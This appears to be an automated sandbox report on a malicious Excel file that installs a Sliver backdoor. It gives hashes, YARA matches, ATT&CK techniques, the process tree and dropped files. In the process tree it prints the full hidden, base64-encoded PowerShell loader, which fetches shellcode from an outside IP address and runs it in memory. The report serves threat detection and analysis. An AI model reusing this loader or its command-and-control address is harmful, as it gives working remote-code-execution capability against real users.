sliver | 311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2

General

Target

311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2.xls
Size

46KB
MD5

7fd89567643fb7500b272127984b7e80
SHA1

7b3eb36264ad0907f9a7bb9368ef8be69bb00d98
SHA256

311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2
SHA512

f476903b4259b29ee5f36adc1f425cc105f3080373409a0d19b9558d827dbb9d747023ecd2b1afe8304e3ca043b921143a89bca8a61914e8e26ab6b83edccf4b
SSDEEP

768:04SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:vSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4132	448	powershell.exe	EXCEL.EXE

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4132-72-0x0000020CA2F90000-0x0000020CA3A0E000-memory.dmp	SliverRAT_v2
behavioral2/memory/4132-74-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp	SliverRAT_v2
behavioral2/memory/4132-75-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp	SliverRAT_v2
behavioral2/memory/4132-73-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp	SliverRAT_v2
behavioral2/memory/4132-76-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp	SliverRAT_v2
behavioral2/memory/4132-77-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 21 IoCs

Processes:

powershell.exe

flow	pid	process
21	4132	powershell.exe
23	4132	powershell.exe
33	4132	powershell.exe
34	4132	powershell.exe
35	4132	powershell.exe
36	4132	powershell.exe
37	4132	powershell.exe
38	4132	powershell.exe
48	4132	powershell.exe
52	4132	powershell.exe
54	4132	powershell.exe
55	4132	powershell.exe
56	4132	powershell.exe
57	4132	powershell.exe
58	4132	powershell.exe
59	4132	powershell.exe
60	4132	powershell.exe
61	4132	powershell.exe
62	4132	powershell.exe
63	4132	powershell.exe
64	4132	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4132 powershell.exe

pid	process
4132	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

448 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4132 powershell.exe
4132 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4132 powershell.exe

pid	process
4132	powershell.exe
4132	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4132	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE
448	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	process	target process
PID 448 wrote to memory of 4132	448	EXCEL.EXE	powershell.exe
PID 448 wrote to memory of 4132	448	EXCEL.EXE	powershell.exe
PID 4132 wrote to memory of 4364	4132	powershell.exe	csc.exe
PID 4132 wrote to memory of 4364	4132	powershell.exe	csc.exe
PID 4364 wrote to memory of 1648	4364	csc.exe	cvtres.exe
PID 4364 wrote to memory of 1648	4364	csc.exe	cvtres.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dfezlkn2\dfezlkn2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp" "c:\Users\Admin\AppData\Local\Temp\dfezlkn2\CSCA9628215C6A34E628CB8AF82894392B.TMP"
      4⤵
      PID:1648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp

Filesize
1KB

MD5
8f82aea706d90bb77ee75c3afcec526d

SHA1
822b50d812f46b3c770ff502983d182f88cb65be

SHA256
b2bc52c53ea3a1e1ab2cc9c27e1b4f155d427588198ced929d42f028b7877b25

SHA512
df4773f44151f588c51d53fed50e1c9ad79ec2241ca526f29fce1ebf168f072baed6784cd283b945a77a055e4d948a6f4c8f83e96dc883c81649a60846f2aed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gnlics0x.awo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dfezlkn2\dfezlkn2.dll

Filesize
3KB

MD5
1d19bd4b657c388009e0fa6b1a16105f

SHA1
b6deca2b68c1837e07e33fa0fbc7f94c3ce6cfcf

SHA256
1c22ecbf328a9a2d964be3752743634aba6af1af37d10ea2daa3fe0a48dbaa3a

SHA512
21bb384896c14bdd84f51e36b36ae1f90953e32e85b5633755869eea6069305445d85346ced42ead5dfa5b114ad72485cd83432e7de8cfc86b6a73ccdcd39aa5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dfezlkn2\CSCA9628215C6A34E628CB8AF82894392B.TMP

Filesize
652B

MD5
197486cf3d10b883f66e777e6cbb6e60

SHA1
4d3e72e87b47d4810f912a5a2c37ef4976252ccc

SHA256
3bfad53bd998f98a15e3e2887b105f74f09aeeb740ac2564c6b27e65c58ea624

SHA512
51e8c8a41a5a80f62ccee3ba3ba822e9c6147200b9bc24c33831920ffcb66220ded5435f16725dc1cf79bc988797f997d71c5bed6c500aed28f9dc3c518353c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dfezlkn2\dfezlkn2.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dfezlkn2\dfezlkn2.cmdline

Filesize
369B

MD5
41ab6ce38d23e7a3b5605164c9e913dd

SHA1
876477396551f62cc1b3351592f6d0b097d29132

SHA256
7fb605171f3f89259012b021d9ebd1c50ac86a4657b1d2f66863f852126149d8

SHA512
ef992190a09bbfc14c3b3d01189b3d16fe82b5ebbf2e7dcb8d1b6deaf594f92f30c11d5c0f082ee5077ecfa6c5b3fd8fae61ed4dc84fd307bf4792cf72177fc7

Download Submit
memory/448-18-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-11-0x00007FFCB5380000-0x00007FFCB5390000-memory.dmp

Filesize
64KB

Download
memory/448-13-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-12-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-5-0x00007FFCB7890000-0x00007FFCB78A0000-memory.dmp

Filesize
64KB

Download
memory/448-4-0x00007FFCB7890000-0x00007FFCB78A0000-memory.dmp

Filesize
64KB

Download
memory/448-1-0x00007FFCB7890000-0x00007FFCB78A0000-memory.dmp

Filesize
64KB

Download
memory/448-0-0x00007FFCB7890000-0x00007FFCB78A0000-memory.dmp

Filesize
64KB

Download
memory/448-14-0x00007FFCB5380000-0x00007FFCB5390000-memory.dmp

Filesize
64KB

Download
memory/448-15-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-17-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-16-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-20-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-19-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-2-0x00007FFCB7890000-0x00007FFCB78A0000-memory.dmp

Filesize
64KB

Download
memory/448-29-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-30-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-6-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-71-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-9-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-10-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-7-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-8-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-3-0x00007FFCF78AD000-0x00007FFCF78AE000-memory.dmp

Filesize
4KB

Download
memory/448-67-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/448-64-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/4132-60-0x0000020CA26B0000-0x0000020CA26B8000-memory.dmp

Filesize
32KB

Download
memory/4132-44-0x0000020CA2680000-0x0000020CA26A2000-memory.dmp

Filesize
136KB

Download
memory/4132-72-0x0000020CA2F90000-0x0000020CA3A0E000-memory.dmp

Filesize
10.5MB

Download
memory/4132-74-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp

Filesize
10.9MB

Download
memory/4132-75-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp

Filesize
10.9MB

Download
memory/4132-73-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp

Filesize
10.9MB

Download
memory/4132-76-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp

Filesize
10.9MB

Download
memory/4132-77-0x0000020CA4490000-0x0000020CA4F76000-memory.dmp

Filesize
10.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads